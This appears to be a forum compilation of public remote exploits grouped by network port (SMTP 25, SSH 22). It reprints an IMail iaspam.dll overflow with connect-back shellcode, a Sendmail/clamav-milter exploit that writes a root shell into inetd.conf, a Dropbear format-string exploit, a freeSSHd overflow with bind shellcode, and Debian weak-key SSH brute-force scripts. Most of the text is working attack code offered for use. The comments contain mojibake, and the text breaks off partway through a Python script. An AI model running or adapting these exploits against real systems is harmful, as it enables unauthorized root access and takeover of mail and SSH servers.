// ÅöÃÂÊÃÂ� �µÚŒž·Ã ¢Ã“ÊŒþ
if (the_mail == 0) // ·¢Ò»·Ã� �¢Ã‚·ÃÂÓÊŒÃ� �¾Â£Â¬ÃŒÃ¡Å¾à ƒÂŸÃ‚³Ã‰Â¹Å Ã‚Ê
{
/*
my $padding = "\x22"."B"x2028;
my $padding1 = "B"x2046;
my $padding11 = "B"x146; #163žöB
my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # ÔÚtebÖÃÂ
my $straddr2 = "\x50\xc0\xfd\x7f"; # shellcode»á¿œ ±Å½ÂµÅ“µÄ µØÖ·
print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
*/
memcpy(payload, szCT, strlen((const char *)szCT));
//memcpy(payload+strlen(const char *szCT), "\"", 1);
memset(padding, 0x43, 5000);
padding[0] = '\x22';
padding[2029] = '\x20';
padding[4076] = '\x20';
//straddr1
padding[4223] = '\x50';
padding[4224] = '\xd0';
padding[4225] = '\xfd';
padding[4226] = '\x7f';
padding[4227] = '\x30';
padding[4228] = '\xd0';
padding[4229] = '\xfd';
padding[4230] = '\x7f';
//straddr2 0x10036ea0
padding[4231] = '\x30';
padding[4232] = '\xd8';
padding[4233] = '\xfd';
padding[4234] = '\x7f';
padding[4235] = '\x0d';
padding[4236] = '\x0a';
padding[4237] = '\x00';
memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
send(s, (const char *)payload, strlen((const char *)payload), 0);
Sleep(100);
// MIME
send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
// recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
// printf("[+]****ing Server at %s.\n", szTIME);
// memset(buffer, 0, sizeof(buffer));
//print $sock "Content-Transfer-Encoding:$padding2\r\n";
memset(padding, 0x43, 80);
//memcpy(padding, "\x43", 80);
padding[80] = '\x00';
memset(payload, 0x00, sizeof(payload));
memcpy(payload, szCTE, strlen((const char*)szCTE));
memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);
Sleep(200);
send(s, (const char *)payload, strlen((const char *)payload), 0);
memset(payload, 0x00, sizeof(payload));
}
else if (the_mail == 1) // ¹¹Ôìbufferoverflow� �‚µÃ„ž²žà‡ÃƒÂ—Ö·ûŽÃ� ��®
{
/*
my $padding = "\x22"."B"x2028;
my $padding1 = "B"x2046;
my $padding11 = "B"x146; #163žöB
my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # ÔÚtebÖÃÂ
my $straddr2 = "\x50\xc0\xfd\x7f"; # shellcode»á¿œ ±Å½ÂµÅ“µÄ µØÖ·
print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
*/
memcpy(payload, szCT, strlen((const char *)szCT));
//memcpy(payload+strlen(const char *szCT), "\"", 1);
memset(padding, 0x43, 5000);
padding[0] = '\x22';
padding[2029] = '\x20';
padding[4076] = '\x20';
//straddr1
padding[4223] = '\x50';
padding[4224] = '\xd0';
padding[4225] = '\xfd';
padding[4226] = '\x7f';
padding[4227] = '\x30';
padding[4228] = '\xd0';
padding[4229] = '\xfd';
padding[4230] = '\x7f';
//straddr2 0x10036ea0
padding[4231] = '\x50';
padding[4232] = '\xc0';
padding[4233] = '\xfd';
padding[4234] = '\x7f';
padding[4235] = '\x0d';
padding[4236] = '\x0a';
padding[4237] = '\x00';
memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
send(s, (const char *)payload, strlen((const char *)payload), 0);
Sleep(100);
// MIME
send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
// recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
// printf("[+]****ing Server at %s.\n", szTIME);
// memset(buffer, 0, sizeof(buffer));
//print $sock "Content-Transfer-Encoding:$padding2\r\n";
memset(padding, 0x43, 80);
//memcpy(padding, "\x43", 80);
padding[80] = '\x00';
memset(payload, 0x00, sizeof(payload));
memcpy(payload, szCTE, strlen((const char*)szCTE));
memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);
Sleep(200);
send(s, (const char *)payload, strlen((const char *)payload), 0);
// send payload ¹¹ÔìÒà§Ã‚³Ã¶ÂµÃ„×à –·ûŽ® eipÖžÃÂòshellcodeÃ� �µÃ„µØÖ·
memset(payload, 0x00, sizeof(payload));
memset(payload, 0x44, 520);
memcpy(payload+520, SCaddr, strlen((const char *)SCaddr));
memcpy(payload+520+4, "\r\n", 2);
Sleep(200);
send(s, (const char *)payload, strlen((const char *)payload), 0);
memset(payload, 0x00, sizeof(payload));
}
else if (the_mail == 2) // ·¢ËÃÂshellcode
{
/*
my $padding = "\x22"."B"x2028;
my $padding1 = "B"x2046;
my $padding11 = "B"x146; #163žöB
my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # ÔÚtebÖÃÂ
my $straddr2 = "\x50\xe7\x03\x10"; # shellcode»á¿œ ±Å½ÂµÅ“µÄ µØÖ·
print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
*/
memcpy(payload, szCT, strlen((const char *)szCT));
//memcpy(payload+strlen(const char *szCT), "\"", 1);
memset(padding, 0x43, 5000);
padding[0] = '\x22';
padding[2029] = '\x20';
padding[4076] = '\x20';
//straddr1
padding[4223] = '\x50';
padding[4224] = '\xd0';
padding[4225] = '\xfd';
padding[4226] = '\x7f';
padding[4227] = '\x30';
padding[4228] = '\xd0';
padding[4229] = '\xfd';
padding[4230] = '\x7f';
//straddr2 0x7ffdc850
padding[4231] = '\x50';
padding[4232] = '\xc8';
padding[4233] = '\xfd';
padding[4234] = '\x7f';
padding[4235] = '\x0d';
padding[4236] = '\x0a';
padding[4237] = '\x00';
memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
send(s, (const char *)payload, strlen((const char *)payload), 0);
// MIME
send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
// recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
// printf("[+]****ing Server at %s.\n", szTIME);
// memset(buffer, 0, sizeof(buffer));
//print $sock "Content-Transfer-Encoding:$padding2\r\n";
memset(padding, 0x43, 80);
//memcpy(padding, "\x43", 80);
padding[80] = '\x00';
memset(payload, 0x00, sizeof(payload));
memcpy(payload, szCTE, strlen((const char*)szCTE));
memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);
send(s, (const char *)payload, strlen((const char *)payload), 0);
Sleep(200);
// ·¢ËÃÂshellcodeÂ� �¹ÃƒÂ½ÃƒÂˆÃ‚¥Â±Â£Ã� �½Ã¦
memset(payload, 0x00, sizeof(payload));
memcpy(payload, sh_Buff, strlen((const char*)sh_Buff));
memcpy(payload+strlen((const char*)sh_Buff), "\r\n", 2);
send(s, (const char *)payload, strlen((const char *)payload), 0);
memset(payload, 0x00, sizeof(payload));
}
else // µÚÈý·â ÓÊŒþ£Â� �¬Ã‚¹Â¹Ã”ìÒÃ� �§Â³Ã¶
{
Sleep(500); // ÒòΪҠªÃ…½Â¥Â·Â¢Ã‚Ã� ��©Â¶Å½ÃÂË£ ¬ËùÒÔÂ� �±ÃƒÂ˜ÃƒÂëÒªÃ� �ÃÂ*µã£¬Â ²Â»ÃˆÂ»shellcodeÃÃ� ��»ÂµÅ“λ
/*
my $padding = "\x22"."B"x2028;
my $padding1 = "B"x2046;
my $padding11 = "B"x146; #163žöB
my $straddr1 = "\x50\xd0\xfd\x7f"."\x30\xd0\xfd\x7f"; # ÔÚtebÖÃÂ
my $straddr2 = "\x6c\x54\x03\x10"; # shellcode»á¿œ ±Å½ÂµÅ“µÄ µØÖ·
print $sock "Content-Type: multipart\/boundary=$padding $padding1 $padding11$straddr1$straddr2\r\n";
*/
memcpy(payload, szCT, strlen((const char *)szCT));
//memcpy(payload+strlen(const char *szCT), "\"", 1);
memset(padding, 0x43, 5000);
padding[0] = '\x22';
padding[2029] = '\x20';
padding[4076] = '\x20';
//straddr1
padding[4223] = '\x50';
padding[4224] = '\xd0';
padding[4225] = '\xfd';
padding[4226] = '\x7f';
padding[4227] = '\x30';
padding[4228] = '\xd0';
padding[4229] = '\xfd';
padding[4230] = '\x7f';
//straddr2 Ž¥·¢ÒÃ� �§Ã‚³Ã¶ÂµÃ„µÃ� �˜Ã–·
padding[4231] = '\x6c';
padding[4232] = '\x54';
padding[4233] = '\x03';
padding[4234] = '\x10';
padding[4235] = '\x0d';
padding[4236] = '\x0a';
padding[4237] = '\x00';
memcpy(payload+strlen((const char *)szCT), padding, strlen((const char *)padding));
send(s, (const char *)payload, strlen((const char *)payload), 0);
// MIME
send(s, (const char *)szMIME, strlen((const char *)szMIME), 0);
// recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
// printf("[+]****ing Server at %s.\n", szTIME);
// memset(buffer, 0, sizeof(buffer));
//print $sock "Content-Transfer-Encoding:$padding2\r\n";
memset(padding, 0x43, 80);
//memcpy(padding, "\x43", 80);
padding[80] = '\x00';
memset(payload, 0x00, sizeof(payload));
memcpy(payload, szCTE, strlen((const char*)szCTE));
memcpy(payload+strlen((const char*)szCTE), padding, strlen((const char*)padding));
memcpy(payload+strlen((const char*)szCTE)+strlen((const char*)padding), "\r\n", 2);
send(s, (const char *)payload, strlen((const char *)payload), 0);
Sleep(200);
// send payload ÃÂÞžÄÖŠ¾ÃƒÂ•ÃƒÂ«Ã‚µÃ˜Ã– ·Â£Â¬Â¹Â¹Ã”� �ƒÂ¬Ã‚³Ã¶Ã’ç³ ö
memset(payload, 0x00, sizeof(payload));
// ÃÂèÒªÖŠ¾ÃƒÂò¹¹ÔÃ� �¬ÃƒÂ’ç³ö×à –·ûŽ®µ� �ƒÂ„µØÖ· £Ã‚¬Ã’ÔŒ°2� �…¾Ã¶Â¿Ã‰ÃÂÃ…Â� �µØÖ·
memcpy(payload, "\x50\xc0\xfd\x7f", 4);
memcpy(payload+4, "\x40\xc0\xfd\x7f\x30\xc0\xfd\x7f", 8);
memcpy(payload+12, "\r\n", 2);
send(s, (const char *)payload, strlen((const char *)payload), 0);
memset(payload, 0x00, sizeof(payload));
}
// END
Sleep(500);
send(s, szEND, strlen(szEND), 0);
recv(s, buffer, sizeof(buffer), 0);
if(strstr(buffer, "250"))
printf("[+]Recv: %s", buffer);
else
{
printf("[-]Seems Service Down~ :( \n");
Disconnect(s);
return -1;
}
memset(buffer, 0, sizeof(buffer));
// QUIT
send(s, szQUIT, strlen(szQUIT), 0);
recv(s, buffer, sizeof(buffer), 0);
// printf("%s", buffer);
printf("[+]****ing END, Ejaculating Now !\n\n");
memset(buffer, 0, sizeof(buffer));
Sleep(400);
closesocket(s);
WSACleanup();
return 0;
}
int main(int argc, char *argv[])
{
//int imail_ver = 0; //imail version (buffer²»Ã¬)
//int ret;
//SOCKET s;
//WSADATA WSAData;
printf("\n== IMail iaspam.dll 8.01-8.11 Private Remote Exploit\n");
printf("== by axis@ph4nt0m\n");
printf("== http://www.ph4nt0m.org\n");
printf("== 2007-06\n");
printf("== 2007-09-18 published as a gift for the 6th Anniversary of Ph4nt0m\n");
printf("== ConnBack Version\n");
printf("== Thanks EnvyMask@ph4nt0m\n\n");
if(argc != 5)
{
help(argv[0]);
return 0;
}
if(argc == 5) port = atoi(argv[4]);
GetShellCode(argv[3], port);
if (!sh_Len)
{
printf("[-] Shellcode generate error.\n");
exit(1);
}
//printf("shellcode length is: %d \n",strlen((char *)sh_Buff));
//PrintSc(sh_Buff, sh_Len);
Sleep(200);
for (int mail_payload = 0; mail_payload <= 3; mail_payload++)
{
//printf("[+]Now Sending the %d ****ing Mail!\n",mail_payload+1);
send****ingmail(mail_payload, argv[1], atoi(argv[2]));
Sleep(2000);
}
printf("Got a Shell on your port ?! @_@\n\n");
return 1;
}
// [2007-09-21]
25 Sendmail with clamav-milter < 0.91.2 Remote Root Exploit
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
################################################## ######
use IO::Socket;
print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";
if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}
print "Attacking $ARGV[0]...\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";
while (<$sock>) {
print;
}
# [2007-12-21]
25 Citadel SMTP <= 7.10 Remote Overflow Exploit
Citadel SMTP <= 7.10 Remote Overflow Exploit
http://www.enigmagroup.org/sploits/2008-vs-GNU-citadel.tar.gz
# [2008-01-21]
##################################
انتهينا من بورت 22 و بورت 23 و بورت 25
ارجو حفظ الحقوق للجيوش الهكر
تحياتي
#################################
السلام عليكم و رحمة الله و بركاته
إن شاء الله تكونو في افضل حال
بين ايدينا الان 3 بورتات :
بورت 22 و بورت 23 وبورت 25 وطرحنا مسبقاً بورت 21 و الان تبقىآ لدينا 100 بورت .
نقول بسم الله الرحمن الرحيم
نبداء بـ بورت 22
22 Dropbear SSH <= 0.34 Remote Root Exploit
/*
* Linux x86 Dropbear SSH <= 0.34 remote root exploit
* coded by live
*
* You'll need a hacked ssh client to try this out. I included a patch
* to openssh-3.6.p1 somewhere below this comment.
*
* The point is: the buffer being exploited is too small(25 bytes) to hold our
* shellcode, so a workaround was needed in order to send it. What I did here
* was to hack the ssh client so that it sends the local environment variable
* SHELLCODE as ssh's methodname string. This method was described by Joel
* Eriksson @ 0xbadc0ded.org.
*
* The 25 bytes limitation is also the reason for the the strange ``2 byte''
* retaddr you will see here. That's not enough for complete pointer overwrite,
* so I decided to overwrite 3rd and 2nd bytes and hope our shellcode is
* around ;)
*
* % telnet localhost 22
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* SSH-2.0-dropbear_0.34
* ^]
* telnet> quit
* Connection closed.
*
* % objdump -R /usr/local/sbin/dropbear| grep malloc
* 080673bc R_386_JUMP_SLOT malloc
*
* % drop-root -v24 localhost
* ?.2022u%24$hn@localhost's password:
* Connection closed by 127.0.0.1
*
* % telnet localhost 10275
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* id; exit;
* uid=0(root) gid=0(root) groups=0(root)
* Connection closed by foreign host.
*
* In the above example we were able to lookup a suitable .got entry(used as
* retloc here), but this may not be true under a hostile environment. If
* exploiting this remotely I feel like chances would be greater if we attack
* the stack, but that's just a guess.
*
* Version pad is 24 to 0.34, 12 to 0.32. I don't know about other versions.
*
* gr33tz: ppro, alcaloide and friends.
*
* 21.08.2003
* Please do not distribute
*/
/*
--- sshconnect2.c2003-08-21 21:34:03.000000000 -0300
+++ sshconnect2.c.hack2003-08-21 21:33:47.000000000 -0300
@@ -278,6 +278,8 @@
void
userauth(Authctxt *authctxt, char *authlist)
{
+ char *shellcode = getenv("SHELLCODE");
+
if (authlist == NULL) {
authlist = authctxt->authlist;
} else {
@@ -290,6 +292,7 @@
if (method == NULL)
fatal("Permission denied (%s).", authlist);
authctxt->method = method;
+ authctxt->method->name = shellcode;
if (method->userauth(authctxt) != 0) {
debug2("we sent a %s packet, wait for reply", method->name);
break;
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define SSH_PATH "ssh"
#define SSH_PORT "22"
#define DEFAULT_VERSION_PAD 24
#define DEFAULT_RETLOC 0xbffff800
#define DEFAULT_RETADDR 0x080e /* 2 byte retaddr, not enough space for a
* full overwrite. */
/* fork/bind shellcode by live
* default port is 10275
*
* I believe this can be futher optmized, but size is not
* an issue here since we are sending the shellcode through
* a ssh variable which is about 30k bytes long.
*/
char shellcode[] =
"x31xc0" /* xor %eax,%eax */
"xb0x02" /* mov $0x2,%al */
"xcdx80" /* int $0x80 */
"x85xc0" /* test %eax,%eax */
"x75x54" /* jne 5e */
"xebx50" /* jmp 5c */
"x5e" /* pop %esi */
"x31xc0" /* xor %eax,%eax */
"x31xdb" /* xor %ebx,%ebx */
"x89x46x08" /* mov %eax,0x8(%esi) */
"xb0x02" /* mov $0x2,%al */
"x89x06" /* mov %eax,(%esi) */
"xfexc8" /* dec %al */
"x89x46x04" /* mov %eax,0x4(%esi) */
"xb0x66" /* mov $0x66,%al */
"xfexc3" /* inc %bl */
"x89xf1" /* mov %esi,%ecx */
"xcdx80" /* int $0x80 */
"x89x06" /* mov %eax,(%esi) */
"x89x4ex04" /* mov %ecx,0x4(%esi) */
"x80x46x04x0c" /* addb $0xc,0x4(%esi) */
"x31xc0" /* xor %eax,%eax */
"xb0x10" /* mov $0x10,%al */
"x89x46x08" /* mov %eax,0x8(%esi) */
"xb0x02" /* mov $0x2,%al */
"x66x89x46x0c" /* mov %ax,0xc(%esi) */
"x66xb8x28x23" /* mov $0x2328,%ax */
"x89x46x0e" /* mov %eax,0xe(%esi) */
"x31xc0" /* xor %eax,%eax */
"x89x46x10" /* mov %eax,0x10(%esi) */
"xb0x66" /* mov $0x66,%al */
"xfexc3" /* inc %bl */
"xcdx80" /* int $0x80 */
"xfexcb" /* dec %bl */
"x89x5ex04" /* mov %ebx,0x4(%esi) */
"x31xc0" /* xor %eax,%eax */
"xb0x66" /* mov $0x66,%al */
"xb3x04" /* mov $0x4,%bl */
"xcdx80" /* int $0x80 */
"xebx04" /* jmp 60 */
"xebx44" /* jmp a2 */
"xebx3a" /* jmp 9a */
"x31xc0" /* xor %eax,%eax */
"x89x46x04" /* mov %eax,0x4(%esi) */
"x89x46x08" /* mov %eax,0x8(%esi) */
"xb0x66" /* mov $0x66,%al */
"xfexc3" /* inc %bl */
"xcdx80" /* int $0x80 */
"x31xc9" /* xor %ecx,%ecx */
"x89xc3" /* mov %eax,%ebx */
"x31xc0" /* xor %eax,%eax */
"xb0x3f" /* mov $0x3f,%al */
"xcdx80" /* int $0x80 */
"xfexc1" /* inc %cl */
"x80xf9x03" /* cmp $0x3,%cl */
"x75xf3" /* jne 72 */
"x68x2fx2fx73x68" /* push $0x68732f2f */
"x68x2fx62x69x6e" /* push $0x6e69622f */
"x89xe3" /* mov %esp,%ebx */
"x31xc0" /* xor %eax,%eax */
"x88x43x08" /* mov %al,0x8(%ebx) */
"x50" /* push %eax */
"x53" /* push %ebx */
"x89xe1" /* mov %esp,%ecx */
"x89xe2" /* mov %esp,%edx */
"xb0x0b" /* mov $0xb,%al */
"xcdx80" /* int $0x80 */
"x31xc0" /* xor %eax,%eax */
"x31xdb" /* xor %ebx,%ebx */
"xfexc0" /* inc %al */
"xcdx80" /* int $0x80 */
"xe8x65xffxffxff" /* call c <up> */
;
static void usage(const char *progname);
int
main(int argc, char *argv[])
{
char buffer[29500], fmt[26], *target;
long int retloc, retaddr;
int ch, version_pad;
retloc = DEFAULT_RETLOC +1;
retaddr = DEFAULT_RETADDR -40;
version_pad = DEFAULT_VERSION_PAD;
while ( (ch = getopt(argc, argv, "l:r:v:")) != -1) {
switch (ch) {
case 'l':
retloc += atoi(optarg) *4;
break;
case 'r':
retaddr += atoi(optarg) *4;
break;
case 'v':
version_pad = atoi(optarg);
break;
}
}
if (argc -optind != 1) {
usage(argv[0]);
exit(-1);
}
argc -= optind;
argv += optind;
target = argv[0];
memset(buffer, 0x90, 29500);
memcpy(buffer +29500 -strlen(shellcode), shellcode, strlen(shellcode));
memcpy(buffer, "SHELLCODE=", 10);
putenv(buffer);
snprintf(fmt, sizeof fmt, "%c%c%c%c%%.%du%%%d$hn",
(retloc & 0xff),
(retloc & 0xff00) >> 8,
(retloc & 0xff0000) >> 16,
(retloc & 0xff000000) >> 24,
retaddr,
version_pad);
execl(SSH_PATH, "ssh", "-l", fmt, "-p", SSH_PORT, target, NULL);
exit(0);
}
static void
usage(const char *progname) {
fprintf(stderr, "Linux x86 Dropbear SSH <= 0.34 remote root exploitn");
fprintf(stderr, "coded by livenn");
fprintf(stderr, "Usage: %s [-l <retloc offset>] [-r <retaddr offset>]"
" [-v <version pad>] <target>n", progname);
}
// [2004-08-09]
22 freeSSHd <= 1.0.9 Key Exchange Algorithm Buffer Overflow Exploit
#!/usr/bin/env python
"""
Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0
ahmadtauqeer[at]yahoo.com
Disclaimer: This Proof of concept exploit is for educational purpose only.
Please do not use it against any system without prior permission.
You are responsible for yourself for what you do with this code.
Greetings: All the Pakistani White Hats including me ;)
Flames: To all the skript kiddies out there. Man grow up!.
Code tasted against freeSSHd version 1.0.9
If you didn't get shell at first try, try few times and you will get lucky
Advisories:
http://www.securityfocus.com/bid/17958
http://www.frsirt.com/english/advisories/2006/1786
"""
import socket
import getopt
import sys
host = "192.168.0.2"
port = 0
eip =""
#/* win32_bind - EXITFUNC=thread LPORT=1977 Size=317 Encoder=None http://metasploit.com */
shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x 24\x24\x8b\x45" \
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x 20\x01\xeb\x49" \
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x 07\xc1\xca\x0d" \
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x 24\x01\xeb\x66" \
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x 6c\x24\x1c\x61" \
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x 1c\xad\x8b\x40" \
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x 66\x68\x33\x32" \
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x 3b\x50\xff\xd6" \
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\x d0\x68\xd9\x09" \
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x 43\x53\xff\xd0" \
"\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x 70\xc7\x57\xff" \
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x 57\xff\xd6\x53" \
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x 54\x54\x55\xff" \
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\x d0\x66\x6a\x64" \
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\x e7\x6a\x44\x89" \
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x 8d\x7a\x38\xab" \
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x 5b\x57\x52\x51" \
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\x d9\x05\xce\x53" \
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\x c4\x64\xff\xd6" \
"\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\x d0"
def exploit():
buff = "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x 6e\x53\x53\x48" \
"\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x 00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x07\xde"
buff = buff + "A" * 1055
buff = buff + eip
buff = buff + "yyyy"
buff = buff + "\x90" * 4
buff = buff + shellcode
buff = buff + "B" * 19021 + "\r\n"
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((host, port))
print "+ Recive reply from server: " + sock.recv(1000)
sock.send(buff)
print "+ SSHD exploited. Now telnet to port 1977 to get shell "
print "+ if you didnt get shell in first try.Try again until you success"
sock.close()
sock = None
def usage():
print "#############################################"
print "# CODED BY TAUQEER AHMAD #"
print "# Scientist #"
print "#############################################"
print "\n"
print "Usage: %s -h <hostip> -p <port> -o <OS>" % sys.argv[0]
print "Following OS supported\n"
print "1 Window XP SP1"
print "2 Window XP SP2"
print "3 Windows 2000 Advanced Server"
if __name__ == '__main__':
if len(sys.argv) < 7:
usage()
sys.exit()
try:
options = getopt.getopt(sys.argv[1:], 'h:p:o:')[0]
except getopt.GetoptError, err:
print err
usage()
sys.exit()
for option, value in options:
if option == '-h':
host = value
if option == '-p':
port = int(value)
if option == '-o':
if value == '1':
eip = "\xFC\x18\xD7\x77" # 77D718FC JMP ESP IN USER32.dll (Windows Xp professional SP1)
elif value == '2':
eip = "\x0A\xAF\xD8\x77" # 77D8AF0A JMP ESP IN USER32.DLL (Windows Xp professional SP2)
elif value == '3':
eip = "\x4D\x3F\xE3\x77" # 77E33F4D JMP ESP IN USER32.DLL (windows 2000 advanced server)
elif value == '4:
eip = "\x29\x4c\xE1\x77" # 77E14c29 JMP ESP IN USER32.DLL (windows 2000 Prof. SP4)
else:
usage()
sys.exit()
exploit()
# [2006-05-15]
22 Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.
This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.
On an unpatched system, which doesn't need to be debian, do the following:
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://enigmagroup.org/sploits/debian_ssh_rsa_2048_x86.tar.bz2
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)
4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By [email protected]\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
[email protected]
# [2008-05-15]
22 Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)
#!/usr/bin/ruby
#
# Debian SSH Key Tester
# L4teral <l4teral [at] gmail com>
#
# This tool helps to find user accounts with weak SSH keys
# that should be regenerated with an unaffected version
# of openssl.
#
# You will need the precalculated keys provided by HD Moore
# See http://metasploit.com/users/hdm/tools/debian-openssl/
# for further information.
#
# Usage:
# debian_openssh_key_test.rb <host> <user> <keydir>
#
require 'thread'
THREADCOUNT = 10
KEYSPERCONNECT = 3
queue = Queue.new
threads = []
keyfiles = []
host = ARGV.shift or raise "no host given!"
user = ARGV.shift or raise "no user given!"
keysdir = ARGV.shift or raise "no key dir given!"
Dir.new(keysdir).each do |f|
if f =~ /\d+$/ then
keyfiles << f
queue << f
end
end
totalkeys = queue.length
currentkey = 1
THREADCOUNT.times do |i|
threads << Thread.new(i) do |j|
while !queue.empty?
keys = []
KEYSPERCONNECT.times { keys << queue.pop unless queue.empty? }
keys.map! { |f| f = File.join(keysdir, f) }
keys.each do |k|
puts "testing key #{currentkey}/#{totalkeys} #{k}..."
currentkey += 1
end
system "ssh -l #{user} -o PasswordAuthentication=no -i #{keys.join(" -i ")} #{host} \"exit\" &>/dev/null"
if $? == 0 then
keys.each do |k|
system "ssh -l #{user} -o PasswordAuthentication=no -i #{k} #{host} \"exit\" &>/dev/null"
if $? == 0 then
puts "KEYFILE FOUND: \n#{k}"
exit
end
end
end
end
end
end
trap("SIGINT") do
threads.each { |t| t.exit() }
exit
end
threads.each { |t| t.join }
# \[2008-05-16]
22 Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)
#!/bin/python
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
################################################## ##########################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
# http://enigmagroup.org/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
# - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
# - execute: python exploit.py (without parameters) to display the help
# - if the key is found, the script shows something like that:
